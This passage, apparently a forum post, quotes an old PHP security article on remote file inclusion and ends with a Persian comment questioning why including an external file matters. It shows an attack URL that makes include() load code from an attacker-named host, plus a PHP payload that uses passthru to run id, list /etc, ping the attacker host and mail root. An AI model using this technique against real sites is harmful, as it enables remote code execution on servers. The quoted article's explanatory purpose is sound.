In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:
http://example.com/page.php?i=http://evilhacker.org/exec.html
Where exec.html contains a couple of lines of code:
<?php
passthru ('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
?>
http://www.zend.com/zend/art/art-oertli.php
منظورم چیزی که در قسمت مربوطه در این مقاله گفته شده هر چی فکر می کنم می بینم باز شدن یک فایل خارجی نباید تاثیری داشته باشه